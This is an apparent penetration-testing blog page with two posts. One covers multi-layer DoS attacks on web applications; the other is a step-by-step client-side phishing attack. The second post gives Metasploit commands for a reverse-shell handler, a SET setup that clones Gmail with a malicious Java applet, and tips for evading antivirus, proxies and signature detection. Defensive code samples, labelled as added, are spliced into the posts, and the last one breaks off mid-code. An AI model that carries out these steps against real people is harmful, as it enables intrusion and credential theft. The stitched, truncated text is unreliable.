Special care should also be taken when attacking each layer separately, and of course a detailed audit of the engaged technologies must be conducted before launching the attack. What I mean is that, based on the type of attack planned and the way the Web system behaves, a relatively complex customized DoS or DDoS attack can be launched in a highly effective manner (you will understand later what I mean by that).<br />
<br />
The following picture shows how different vulnerabilities can be associated with each layer and cause a DoS attack:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK-7FtuhJYKSFsowRrx9ZsUj0LqdYMykMFZMV4iwGxFn5U9UHLDO73FLCl2nWJmrN5gdOijFmxtN77pDFzHwolcYxorY3car0BRD8Q98k6MQOBmpYvoEhLKjq3CNCiAyQ_ZZfjgo9N0YY/s1600/neworig21302.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK-7FtuhJYKSFsowRrx9ZsUj0LqdYMykMFZMV4iwGxFn5U9UHLDO73FLCl2nWJmrN5gdOijFmxtN77pDFzHwolcYxorY3car0BRD8Q98k6MQOBmpYvoEhLKjq3CNCiAyQ_ZZfjgo9N0YY/s1600/neworig21302.png" width="640" /></a></div>
<br />
<b>Note:</b> The above diagram shows how combined attacks on all three layers of the target server can be used to amplify a DoS or DDoS attack and make it practically unstoppable. Imagine an advanced attacker launching an attack like that (meaning combining all the different types of vulnerabilities).<br />
<br />
A generic low tech DoS attack might be easy to defeat when proper countermeasures are taken, but what happens when the attacker knows also the counter measures for the counter measures a defender would use? Well you might be confused now, but hopefully you will understand what I mean later on.<br />
<b><br /></b>
<b>DoS-ing the Web Application Server </b> <br />
<b><br /></b>
A number of well documented and known, but <u>not so interesting attacks</u> can be launched at the Web Server level by simply performing one of the well known and famous attacks named below (this is a sample of the total number of DoS and DDoS attack types someone can use against a Web Server):<br />
<ul>
<li><b>ICMP flood also known as Smurf attack</b></li>
<ul>
<li>A smurf attack is one particular variant of a flooding DoS attack on the public Internet. It relies on misconfigured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The network then serves as a smurf amplifier. </li>
</ul>
</ul>
<b>Note: </b>This is an outdated attack and most of the time it is not going to be feasible against high profile targets such as important US government web sites, for example. But it can be used for diversion, e.g. flooding surrounding machines along with the target machine might confuse the intrusion prevention middle device (simplistically speaking of course) about the network source of the attackers.<br />
<ul>
<li><b>SYN flood</b></li>
<ul>
<li>A SYN flood occurs when a host sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to spawn a half-open connection, by sending back a TCP/SYN-ACK packet (Acknowledge), and waiting for a packet in response from the sender address (response to the ACK Packet). </li>
</ul>
</ul>
<div>
<b>Note:</b> This is an old and well documented attack that is also not very interesting, and countermeasures against this specific attack have existed for years from various vendors. </div>
<ul>
<li><b>SSL DoS</b></li>
<ul>
<li>SSL-DoS exploits an SSL design flaw by overloading the server and knocking it off the Internet. This problem affects all SSL implementations today. The vendors have been aware of this problem since 2003 and the topic has been widely discussed. This attack further exploits the SSL secure renegotiation feature to trigger thousands of renegotiations via a single TCP connection.</li>
</ul>
</ul>
<div>
<b>Note: </b>Establishing a secure SSL connection requires 15x more processing power on the server than on the client, which implies that an asymmetric resource starvation attack is possible.</div>
<div>
<ul>
<li><b>Buffer Overflow DoS Attacks</b></li>
<ul>
<li>The data transferred to a user input buffer exceeds the storage capacity of the buffer and some of the data overflows into another buffer, one that the data was not intended to go into. Since buffers can only hold a specific amount of data, when that capacity has been reached the data has to flow somewhere else, typically into another buffer, which can corrupt data that is already contained in that buffer. This can be elevated to a remote command shell that would allow the attacker to remotely shut down or reboot the system, or simply crash the underlying operating system. </li>
</ul>
</ul>
</div>
<div>
<b>Note:</b> Again, this type of attack is considered to be a relatively advanced type of attack, especially when zero day exploits are used; it also implies that an asymmetric DoS attack can happen. </div>
<div>
<br /></div>
<b>DoS-ing the Web Application and Application platform</b><br />
<br />
A DoS attack can also happen at the Web Application or Web Application platform layer. These types of attacks are usually very rare or do not become public most of the time; I call them low publicity DoS and DDoS attacks. The complexity of these attacks is significantly higher than the previous ones if you exclude the Buffer Overflow and SSL DoS attacks (when you don't use online hacking tools). The concept behind these types of attacks is that the attacker has to have knowledge of the Web Application input validation filters. In order to be more clear I will list below the ones I consider the most popular input validation DoS and DDoS attacks:<br />
<ul>
<li><b>SQL Injection DoS attack</b></li>
<ul>
<li>SQL injection is a technique often used to attack a website. This is done by including portions of SQL statements in a Web Application user or non-user entry point in an attempt to get the website to pass a newly formed rogue SQL command to the database; now if the injected command contains a valid SQL shutdown command then the outcome would be for the database to shut down, crashing the Web System under attack.</li>
</ul>
</ul>
<b>Note: </b>Obviously someone can perform an <u>asymmetric DoS attack</u> of this type. You should also take into consideration the fact that an attacker can exploit a blind SQL injection in the same way. A Web Application firewall would not stop a SQL Injection DoS attack if the attacker obfuscates her SQL payloads (for more information on the subject see <a href="http://securityhorror.blogspot.ie/2012/06/obfuscate-sql-fuzzing-for-fun-and.html" target="_blank">previous posts</a>). <br />
<ul>
<li><b>Directory traversal DoS or DDoS attack</b></li>
<ul>
<li>A directory traversal (or path traversal) consists of exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs; directory traversal attacks can also be expanded through bad privilege assignment. Being able to <u>request large size files</u> from the host operating system is usually something that is going to significantly slow down Web Application performance, and that is something the Web Application was initially not designed for. </li>
</ul>
</ul>
<b>Note:</b> This type of attack is likely to be successful in a DDoS type of attack. Imagine multiple users requesting /dev/random on a Unix-like operating system. For more information on obfuscating path traversal check this <a href="http://code.google.com/p/teenage-mutant-ninja-turtles/wiki/AdvancedObfuscationPathtraversal?ts=1350980063&updated=AdvancedObfuscationPathtraversal" target="_blank">link</a>.<br />
<ul>
<li><b>External Entity Injection DoS attack </b></li>
<ul>
<li>An External Entity Injection (XXE) is generally speaking a type of XML injection that allows an attacker to force a badly configured XML parser to "include" or "load" unwanted functionality that compromises the security of a web application. Nowadays it is rare to find these types of security issues. This type of attack has been well documented and known since 2002. By exploiting an XXE injection you can perform a similar attack to the directory traversal DoS attack by loading large documents. </li>
</ul>
</ul>
<b>Note:</b> Again, imagine an attacker requesting large files from the hosting operating system and, especially on Unix-like operating systems, the /dev/random file.<br />
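An added example (not the article's own code) for the traversal and XXE notes above: a resolver that refuses the oversized or never-ending files those two DoS variants rely on, before a single byte is read. The function and class names and the sample directory are constructed for this illustration.<br />

```python
# Added example (not the article's own code): refusing the oversized or
# never-ending files that the traversal and XXE DoS notes rely on, using
# only metadata checks. Names (resolve_served_file, UnsafePath, outcome,
# build_demo_tree) and the sample directory tree are constructed here.
import os
import stat
import tempfile

MAX_BYTES = 1024 * 1024      # assumed per-request cap on the size of a served file


class UnsafePath(Exception):
    """Raised when a requested path must not be served."""


def resolve_served_file(base_dir: str, requested: str, max_bytes: int = MAX_BYTES) -> str:
    """Return the absolute path that may be served, or raise UnsafePath.

    Three checks, all on metadata, so the cost is the same whether the request
    is honest or malicious:
      1. the resolved path stays inside base_dir (stops ../ and symlink escapes);
      2. the target is a regular file: a directory is not servable, and a FIFO
         or a device such as /dev/random never yields EOF, so a read would tie
         up a worker indefinitely;
      3. the size is known and under the cap before the file is ever opened.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise UnsafePath("path escapes the served directory")
    st = os.stat(target)                 # FileNotFoundError propagates for absent files
    if not stat.S_ISREG(st.st_mode):
        raise UnsafePath("not a regular file")
    if st.st_size > max_bytes:
        raise UnsafePath(f"{st.st_size} bytes exceeds the cap of {max_bytes}")
    return target


def outcome(base_dir: str, requested: str, max_bytes: int = MAX_BYTES) -> str:
    """'served' or 'refused: <reason>', in a form suitable for an access log."""
    try:
        resolve_served_file(base_dir, requested, max_bytes)
        return "served"
    except UnsafePath as exc:
        return f"refused: {exc}"


def build_demo_tree() -> str:
    """Constructed sample tree: a small text file, a 4 KiB blob and a subdirectory."""
    root = tempfile.mkdtemp(prefix="served-")
    with open(os.path.join(root, "notes.txt"), "w", encoding="utf-8") as fh:
        fh.write("hello\n")
    with open(os.path.join(root, "dump.bin"), "wb") as fh:
        fh.write(b"\0" * 4096)
    os.mkdir(os.path.join(root, "logs"))
    return root


if __name__ == "__main__":
    root = build_demo_tree()
    for req in ("notes.txt", "../../../../etc/passwd", "logs", "dump.bin"):
        print(f"{req!r:28} -> {outcome(root, req, max_bytes=1024)}")
```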
<ul>
<li><b>Web Application Design DoS Attack</b></li>
<ul>
<li>A Web Application design DoS attack (WADD) is feasible when the Web Application does not take into consideration how it behaves when thousands of malicious payloads are sent. This type of attack also has to do with Web filter malicious payload processing time; for example, Buffer Overflow payloads would probably increase Web filter processing time. </li>
</ul>
</ul>
<b>Note:</b> Imagine an advanced attacker brute forcing Web Application user accounts connected directly to an Active Directory Server. If the Web Application does not have a proper lock out mechanism then Active Directory accounts will be locked.<br />
<br />
The picture below shows a schematic representation of all three attacks mentioned above:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6wzE1fdvxI3IlYq-3TXsKOR_-LObDPNXLK3XIKWxPr8i_EWUMA5i26wxyu9B8vmavPNXxFVh55WbTXEWs4SAhtGFFfahLxxpgeMmn_FJ6bMk8WgJTphbMcTegi8OiNE7kzEFVbPbyC64/s1600/neworig23194.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6wzE1fdvxI3IlYq-3TXsKOR_-LObDPNXLK3XIKWxPr8i_EWUMA5i26wxyu9B8vmavPNXxFVh55WbTXEWs4SAhtGFFfahLxxpgeMmn_FJ6bMk8WgJTphbMcTegi8OiNE7kzEFVbPbyC64/s1600/neworig23194.png" /></a></div>
<br />
<b>Note: </b>In the diagram above the Web filter is particularly emphasized.<br />
<br />
By now you should be able to understand that on most occasions, when someone is fuzzing the Web Application parameters, the corresponding server http response to the malicious http request is going to start to vary as far as the time delay is concerned. One of the desired side effects of that process would be the increase of your chance to randomly crash the Web Application, if the Web Application is not vulnerable to any of the Web Application layer attacks mentioned above (it should be noted at this point that this is a conclusion based on my experience and I don't keep statistics of the crashed Web Applications).<br />
<br />
The diagram below shows a schematic representation of how a web filter is DoS attacked:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi99fFF9b4bgsPIMIDFSZB7Abxf03eOmoNA5MjwaVkUD50Qv6y6wlUIxMzlftqojVLCUU2c57FlqVIrjLRGK-Mdfy7tnchohokjC4ORopCwrO_WSdANVdUiKDx4UsW3P2rXMooae44qSB4/s1600/neworig26757.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi99fFF9b4bgsPIMIDFSZB7Abxf03eOmoNA5MjwaVkUD50Qv6y6wlUIxMzlftqojVLCUU2c57FlqVIrjLRGK-Mdfy7tnchohokjC4ORopCwrO_WSdANVdUiKDx4UsW3P2rXMooae44qSB4/s1600/neworig26757.png" /></a></div>
<b><br /></b>
<b>Note: </b>A Web Application that does not use Web filters at all is possibly vulnerable to one or more of the vulnerabilities mentioned above. A Web Application that does use Web filters might be vulnerable to a Web filter DoS attack.<br />
<br />
<b>DoSing the Web filters</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Web filtering is very important in a Web Application. Imagine a regular expression performing white list filtering on the server side, filtering thousands of malicious http requests. The processing time of the malicious requests can dramatically increase if the implementation of the filter is bad; for example, if you have a Web Application field that accepts as input a three digit number, then the Application should stop processing such requests after the first 10 failed attempts. In fact, during non-production functional testing (e.g. load stress tests) a Web Application might cause a DoS/DDoS condition on itself due to bad Web Application filtering. You may also encounter filters which, rather than blocking input containing the items in the preceding list, attempt to modify the input to make it safe, either by encoding or escaping problematic characters or by stripping the offending items from the input and processing what is left in a normal way. Simplistically speaking, an application should understand when it is being attacked and reject incoming traffic from the malicious IP (e.g. bind session with IP).<br />
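An added example (not the article's own code) of the fail-fast filtering just described: an allow-list validator for the three digit field that runs its cheapest check first, wrapped in a failure budget keyed by client IP rather than by account name, which is also the distinction the Active Directory lockout note above turns on. The class name, the budget of 10 and the request log are constructed here.<br />

```python
# Added example (not the article's own code): a fail-fast server-side filter
# for the article's "three digit number" field, with a failure budget keyed by
# client IP so that a flood of malicious requests is rejected before any
# filtering runs. The class name, budget and request log are constructed here.
from __future__ import annotations

import re
from collections import Counter, defaultdict

THREE_DIGIT_FIELD = re.compile(r"[0-9]{3}")
FIELD_LEN = 3
FAILURE_BUDGET = 10          # the article's "first 10 failed attempts"


class FilterGuard:
    """Per-source failure budget wrapped around an allow-list validator."""

    def __init__(self, budget: int = FAILURE_BUDGET):
        self.budget = budget
        self.failures: dict[str, int] = defaultdict(int)   # client IP -> failed attempts
        self.blocked: set[str] = set()

    def check(self, client_ip: str, value: str) -> tuple[bool, str]:
        """Return (accepted, reason), running the cheapest checks first so that
        each request of a flood costs the server close to nothing."""
        if client_ip in self.blocked:
            return False, "blocked"          # no parsing at all for a known-bad source
        if len(value) != FIELD_LEN:
            # O(1) length check: an oversized (e.g. buffer overflow style)
            # payload is dropped before the regex engine ever sees it.
            return self._fail(client_ip, "bad-length")
        if THREE_DIGIT_FIELD.fullmatch(value) is None:
            return self._fail(client_ip, "bad-format")
        return True, "ok"

    def _fail(self, client_ip: str, reason: str) -> tuple[bool, str]:
        """Count the failure; the budget-th failure blocks the source.
        A production version would expire the counts after a time window."""
        self.failures[client_ip] += 1
        if self.failures[client_ip] >= self.budget:
            self.blocked.add(client_ip)
            return False, "blocked"
        return False, reason


def replay(guard: FilterGuard, requests: list[tuple[str, str]]) -> dict[str, int]:
    """Feed (client_ip, submitted value) pairs through the guard; return outcome counts."""
    summary: Counter[str] = Counter()
    for client_ip, value in requests:
        _, reason = guard.check(client_ip, value)
        summary[reason] += 1
    return dict(summary)


# Constructed request log: one legitimate client and one source sending the
# same 4 KiB junk payload twelve times (documentation-range addresses).
SAMPLE_REQUESTS = (
    [("203.0.113.5", "123")]
    + [("198.51.100.7", "A" * 4096)] * 12
    + [("203.0.113.5", "007")]
)


if __name__ == "__main__":
    print(replay(FilterGuard(), SAMPLE_REQUESTS))
    # {'ok': 2, 'bad-length': 9, 'blocked': 3}
```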
<br />
The following diagram shows a conceptual representation of what I mean: <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht9vSvYM6ooAt_0ADYO8Jzm6TcxVMLBegnpjHtKO5aM8S0yxpS8MzzF17ZYergyMNeEUKTtDgGD8HcUN2_0vuz1SA8AJEu8hkuWxp4fSw-wkQpExASUGO1FOL6XaeIUxOpxgWAKlDpMa4/s1600/neworig31424.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht9vSvYM6ooAt_0ADYO8Jzm6TcxVMLBegnpjHtKO5aM8S0yxpS8MzzF17ZYergyMNeEUKTtDgGD8HcUN2_0vuz1SA8AJEu8hkuWxp4fSw-wkQpExASUGO1FOL6XaeIUxOpxgWAKlDpMa4/s1600/neworig31424.png" /></a></div>
<br />
<b>Note: </b>The malicious http request is rejected immediately after it meets the specific criteria of being characterized as malicious.<br />
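To make the early-rejection idea concrete, here is an added example (not code from the original post) of a fail-fast validator for the three-digit field with the 10-failure cut-off per client IP described above; the class and function names and the sample client IPs are my own assumptions.

```python
"""Fail-fast input filter with a per-client failure budget.

Added example, not code from the original post. It demonstrates the point made
in the text: a field defined as a three-digit number is rejected on length
before any pattern matching, and a client that keeps sending malformed input is
cut off after 10 failed attempts (the figure given in the text) so its traffic
no longer reaches the filter at all. Client IPs used in tests are constructed.
"""
import re
from collections import defaultdict

MAX_LENGTH = 3          # the field is defined as a three-digit number
MAX_FAILURES = 10       # from the text: stop after the first 10 failed attempts
# Anchored, fixed-width pattern: no nested quantifiers, so no catastrophic
# backtracking even if the length check were somehow bypassed.
THREE_DIGITS = re.compile(r"^[0-9]{3}$")


class InputGuard:
    """Validates one field and tracks failed attempts per client IP."""

    def __init__(self, max_failures=MAX_FAILURES):
        self.max_failures = max_failures
        self.failures = defaultdict(int)

    def is_blocked(self, client_ip):
        return self.failures[client_ip] >= self.max_failures

    def check(self, client_ip, value):
        """Return 'blocked', 'rejected' or 'accepted' for one request."""
        # Blocked clients are refused before validation runs: this is the
        # immediate rejection of traffic already characterised as malicious.
        if self.is_blocked(client_ip):
            return "blocked"
        # Cheap O(1) length check first: a multi-megabyte value never
        # reaches the regular expression.
        if len(value) != MAX_LENGTH or not THREE_DIGITS.match(value):
            self.failures[client_ip] += 1
            return "rejected"
        self.failures[client_ip] = 0    # well-formed input resets the budget
        return "accepted"


def run_requests(guard, client_ip, values):
    """Feed a sequence of values from one client; return the verdicts."""
    return [guard.check(client_ip, v) for v in values]
```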
<br />
<b>Combining all DoS attack types together</b><br />
<b><br /></b>
An advanced attacker who combines all the DoS and DDoS attacks explained above would have very good results in compromising the availability of the target server. A combined attack would have the results listed below:<br />
<ol>
<li>A decrease in the number of attacking machines required to bring down the server, since both asymmetric and symmetric types of DoS attack are engaged.</li>
<li>A decrease in the amount of time needed to crash the server, since the attack is multi-layered and takes advantage of a larger number of vulnerabilities identified in the server.</li>
<li>An increase in the time needed for remediation due to the complexity of the attack, therefore increasing the server downtime.</li>
</ol>
<b>Prevention and response</b><br />
<br />
Defending against Denial of Service attacks typically involves a combination of attack detection, traffic classification and response tools, which aim to block traffic they identify as illegitimate and allow traffic they identify as legitimate. But in the case of a combined attack such as the one above there is not much that can be done. My assumption is that a combination of a properly configured Intrusion Prevention System, Web Application Firewall and Database Application Firewall might prevent a DoS or DDoS attack such as the one I described above. <br />
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-39543314754769035342012-09-08T14:34:00.002-07:002012-09-10T10:30:16.979-07:00Industrializing Client Side Attacks <b>Introduction</b><br />
<br />
Cybercrime has evolved into an industry whose value in fraud and stolen property exceeded one trillion dollars in 2009. By contrast, in 2007, professional hacking represented a multibillion-dollar industry. What explains this rapid growth? Industrialization. Just as the Industrial Revolution advanced methods and accelerated assembly from single to mass production in the 19th century, today’s cybercrime industry has similarly transformed and automated itself to improve efficiency, scalability, and profitability.<br />
<br />
The industrialization of hacking coincides with a critical shift in focus. Previously, hackers concentrated attacks on breaking perimeter defences. But today, the goal has changed. The objective is no longer perimeter penetration and defense. Today’s hacker is intent on seizing control of data and the applications that move this data. This is why attacks against Web applications constitute more than 60 percent of total attack attempts observed on the Internet.<br />
<br />
<b>Today's Hacking Scene</b> <br />
<br />
Today’s complex hacking operation now utilizes teamwork, global coordination, and sophisticated criminal techniques designed to elude detection. In recent years, a clear definition of roles and responsibilities has developed within the hacking community forming a supply chain that resembles that of a drug cartel. Additionally, the machine of choice is the botnet – armies of unknowingly enlisted computers controlled by hackers. Modern botnets scan and probe the Web seeking to exploit vulnerabilities and extract valuable data, conduct brute force password attacks, disseminate spam, distribute malware, and manipulate search engine results. These botnets operate with the same comprehensiveness and efficiency used by Google spiders to index websites. Researchers estimate that some 14 million computers have already been enslaved by botnets. <br />
<br />
Improvements in automated and formalized attack tools and services have introduced a new set of security problems for businesses. Of the top 10 data breaches in 2009, half involved stolen laptops, while the other half involved Web and database assaults.<br />
<br />
<b>Client side attacks are on the rise</b><br />
<br />
Client-side vulnerabilities are among the biggest threats facing users. Nowadays there has been a slight shift to the client side, because server-side applications have been targets for attackers since 2001 and have matured somewhat. Attackers are also going after weaknesses in desktop applications such as browsers, media players, common office applications and e-mail clients. The remedy is to maintain the most current application patch levels, keep antivirus software updated, and seek out and remove unauthorized applications.<br />
<br />
<b>Understanding client side attacks</b> <br />
<br />
In order to understand client-side attacks, let us briefly describe server-side attacks, which we can contrast with client-side attacks. Servers expose services that clients can interact with. As a server exposes services, it exposes potential vulnerabilities that can be attacked. Merely running a server puts one at risk, because a hacker can initiate an attack on the server at any time. <br />
<br />
Client-side attacks are quite different. These are attacks that target vulnerabilities in client applications that interact with a malicious server or process malicious data. Here, the client initiates the connection that could result in an attack. If a client does not interact with a server, it is not at risk, because it doesn’t process any potentially harmful data sent from the server. <br />
<br />
A typical example of a client-side attack is a malicious web page targeting a specific browser vulnerability that, if the attack is successful, would give the malicious server complete control of the client system. Client-side attacks are not limited to the web setting, but can occur on any client/server pair, for example e-mail, FTP, instant messaging, multimedia streaming, etc.<br />
<br />
Clients are only protected in environments where access from internal clients to servers on the Internet is restricted via traditional defenses like firewalls or proxies. However, a firewall, unless combined with other technologies such as IPS, only restricts network traffic; once the traffic is permitted, a client interacting with a server is at risk. More advanced corporate filtering solutions are available, but typically these only protect a limited set of client technologies.<br />
<br />
<b>Dropping the payload</b><br />
<br />
There are various ways an attacker can drop her payload onto the targeted workstation or laptop; some of them are listed below:<br />
<ol>
<li>Through clicking evil links pointing at malicious payloads hosted on a server controlled by the attacker.</li>
<li>Through vulnerable web servers, either by compromising them or by exploiting vulnerabilities in them.</li>
<li>Through Man In The Middle attacks.</li>
<li>Through phishing e-mails also holding malicious payloads.</li>
<li>Through various other attacks that are out of the scope of this article.</li>
</ol>
The following image shows one of the most popular ways to <i>"seduce" </i>a user into clicking on a malicious web site:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaspRDp99PLR6G5IZ0kp97tyTjr4zS8ZWrWqANS30Bb6nkIPX8Ssb_1szezXA54_WAo6F3SgjrSpmgKsdaIMO4GzveBRORCVFNGkBmviMaP8LF8NjdO4JS3DJ0TjnEEFMeIOqkgELKZxk/s1600/Drawing1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaspRDp99PLR6G5IZ0kp97tyTjr4zS8ZWrWqANS30Bb6nkIPX8Ssb_1szezXA54_WAo6F3SgjrSpmgKsdaIMO4GzveBRORCVFNGkBmviMaP8LF8NjdO4JS3DJ0TjnEEFMeIOqkgELKZxk/s1600/Drawing1.png" /></a></div>
<br />
<b>Note: </b>This is an old-fashioned attack approach, very well replicated by the penetration testing community during simulated attacks. Of course social engineering is also used throughout that process.<br />
<br />
<b>The actual attack simplified </b><br />
<b><br /></b>
All you need to perform this type of attack is the Social Engineering Toolkit (SET) and Metasploit. Well, not exactly: that is not true if you are going after high-profile targets. But first let's explain the simplified version of the attack. To perform a client-side attack against a user who is NOT protected by serious hardening, such as a reverse SSL proxy with content inspection features and a firewall with proper egress filtering, the tools mentioned above will do the job. Using those tools, the following steps have to be taken:<br />
<ol>
<li>Set up a listener bound to a public IP or DNS name.</li>
<li>Daemonize the listener.</li>
<li>Research the victim's laptop software and hardware.</li>
<li>Social engineer the user into downloading and executing the payload on her laptop.</li>
<li>Use proper payloads for post-exploitation of the victim.</li>
</ol>
<b>Note:</b> Again, this is a simplified attack sequence and is not going to work on a hardened laptop or workstation where the user is not allowed to install software.<br />
<br />
<b>Setting up the listener</b><br />
<br />
So after we successfully generate the desired payload using SET and verify that it is a valid payload, we move on to launching the handler on the attacker's machine. To do that we type the following commands in the order given below:<br />
<ol>
<li>cd /pentest/exploits/framework3</li>
<li>./msfconsole </li>
<li>msf > use exploit/multi/handler</li>
<li>msf exploit(handler)> set PAYLOAD windows/meterpreter/reverse_tcp</li>
<li>msf exploit(handler)> set LHOST publicIP</li>
<li>msf exploit(handler)> set LPORT 123</li>
<li>msf exploit(handler)> exploit -j</li>
</ol>
<b>Note:</b> The attacker's machine should be reachable somehow from the victim's machine (e.g. by using a static public IP or DynDNS).<br />
<br />
<b>Generating the payload and setting up the clone</b><br />
<br />
SET is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly become a standard tool in a penetration tester's arsenal. SET has a feature called “set-automate” which takes an answer file as input and enters the commands in menu mode for you. So for example if I wanted to do the Java Applet attack I would create a file with the following text:<br />
<br />
1<br />
2<br />
1<br />
<br />
https://gmail.com no<br />
<br />
Now let's name the file mySET.txt; the command that will execute a Java applet attack would be:<br />
<br />
root@bt:/pentest/exploits/set# ./set-automate mySET.txt<br />
<br />
<b>Note: </b>The described configuration will launch a multiple web-based attack from SET using the Java Applet attack method, embedding a malicious Java Applet in a Gmail clone. SET will also launch the listener, but it is better if you do it manually.<br />
<br />
<b>After a successful compromise </b><br />
<br />
If the victim is properly social engineered and executes the payload, then the Meterpreter agent will launch a remote shell connection back to the attacker. The Meterpreter (short for Meta-Interpreter) payload gives an attacker an in-memory-only presence and reduces the attacker's need to touch disk to zero. Metasploit will upload a DLL (Meterpreter) to the remote host; the uploaded DLL will be stored in the compromised process's heap. Once loaded, Meterpreter offers the attacker a plethora of options.<br />
<br />
Once Meterpreter’s staged shellcode has been executed and Meterpreter has been loaded, communication begins. Meterpreter’s communication and extensibility are what make it so valuable to an advanced attacker. For the purposes of this article, think of the attacker as the client and the victim as the server. Meterpreter uses a protocol called Type Length Value (TLV).<br />
<br />
<b>Why the above methods won't work in a corporate environment</b><br />
<br />
In a hardened corporate environment a set of prevention technologies is used to protect the user workstations, such as anti-virus software, endpoint security software with a personal firewall, web gateways performing deep content inspection of non-encrypted connections, reverse SSL proxies that validate certificates and filter all SSL connections, and finally IDS/IPS devices. So the reasons an amateur will fail are:<br />
<ol>
<li>Many advanced payloads do not work very well on x86-64 (Windows).</li>
<li>Very restrictive inbound and outbound firewall rules are applied.</li>
<li>Proxy authentication is required for outgoing connections.</li>
</ol>
<b>Note: </b>These are not the only reasons, just the most basic.<br />
<br />
<b>Bypassing defenses</b><br />
<br />
There are numerous techniques for defeating all the defenses mentioned above; some of them are:<br />
<ol>
<li>A code signing certificate for the payload (e.g. for the Meterpreter executable or the malicious Meterpreter Java Applet).</li>
<li>An SSL certificate from a trustworthy Certificate Authority for the payload's communication protocol.</li>
<li>Use a custom communication protocol instead of the one used by Meterpreter, since you don't want to be detected and blocked because you’re mimicking the behavior of a well-known hacking tool. The Metasploit Meterpreter reverse_http(s) payload contains the string "Meterpreter" in the User-Agent header.</li>
<li>Create a custom payload or add your own evasion techniques; this way almost any signature detection system can be bypassed.</li>
<li>Avoid process DLL injection while delivering the payload. The latest versions of Windows enforce session separation, so some of the methods may not work on the latest versions of Windows like Windows 7/8.</li>
</ol>
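From the defender's side, item 3 above gives a usable detection hook. The following added example (not code from the original post) scans constructed forward-proxy log lines for the "Meterpreter" User-Agent string and for plain HTTP to a bare-IP host on a non-web port, such as the port 123 handler set up earlier in the post; the log lines, addresses, port list and function names are my own constructed assumptions.

```python
"""Proxy-log detection for Meterpreter-style reverse_http(s) beacons.

Added example, not code from the original post. It scans forward-proxy log
lines in Apache combined format (constructed below) for (a) the "Meterpreter"
User-Agent string the text says the default payload sends and (b) plain HTTP
to a bare-IP host on a non-web port, like the handler on port 123 set up
earlier in the post. Log lines, addresses and the port list are constructed.
"""
import re
from dataclasses import dataclass

# client - - [timestamp] "METHOD target HTTP/x.y" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
URL_RE = re.compile(r'^(?P<scheme>https?)://(?P<host>[^/:]+)(?::(?P<port>\d+))?')
BARE_IPV4 = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')
WEB_PORTS = {80, 443, 8080, 8443}          # assumed "normal" web ports
TOOL_UA_MARKERS = ("meterpreter",)         # default User-Agent substring named in the text


@dataclass
class Finding:
    client: str
    host: str
    reason: str


def parse_target(method, target):
    """Return (host, port) for an absolute URL or a CONNECT host:port target."""
    if method == "CONNECT":
        host, _, port = target.rpartition(":")
        return host, int(port) if port.isdigit() else 443
    u = URL_RE.match(target)
    if not u:
        return None, None
    port = int(u["port"]) if u["port"] else (443 if u["scheme"] == "https" else 80)
    return u["host"], port


def analyse_line(line):
    """Return a Finding for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, port = parse_target(m["method"], m["target"])
    if host is None:
        return None
    if any(marker in m["ua"].lower() for marker in TOOL_UA_MARKERS):
        return Finding(m["client"], host, "known-tool user-agent")
    if BARE_IPV4.match(host) and port not in WEB_PORTS:
        return Finding(m["client"], host, f"bare-IP host on non-web port {port}")
    return None


def scan(lines):
    """Run analyse_line over every line and keep the hits."""
    return [f for f in map(analyse_line, lines) if f is not None]


# Constructed sample log: a benign GET, a beacon with the tool UA, a beacon
# hiding behind a browser UA but talking to a bare IP on port 123, a benign CONNECT.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Sep/2012:14:34:00 -0700] "GET http://www.example.com/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [08/Sep/2012:14:35:10 -0700] "GET http://203.0.113.9:123/abcd HTTP/1.1" 200 1024 "-" "Meterpreter/Windows"',
    '10.0.0.8 - - [08/Sep/2012:14:36:02 -0700] "POST http://198.51.100.4:123/upload HTTP/1.1" 200 64 "-" "Mozilla/4.0 (compatible)"',
    '10.0.0.9 - - [08/Sep/2012:14:37:00 -0700] "CONNECT mail.example.com:443 HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
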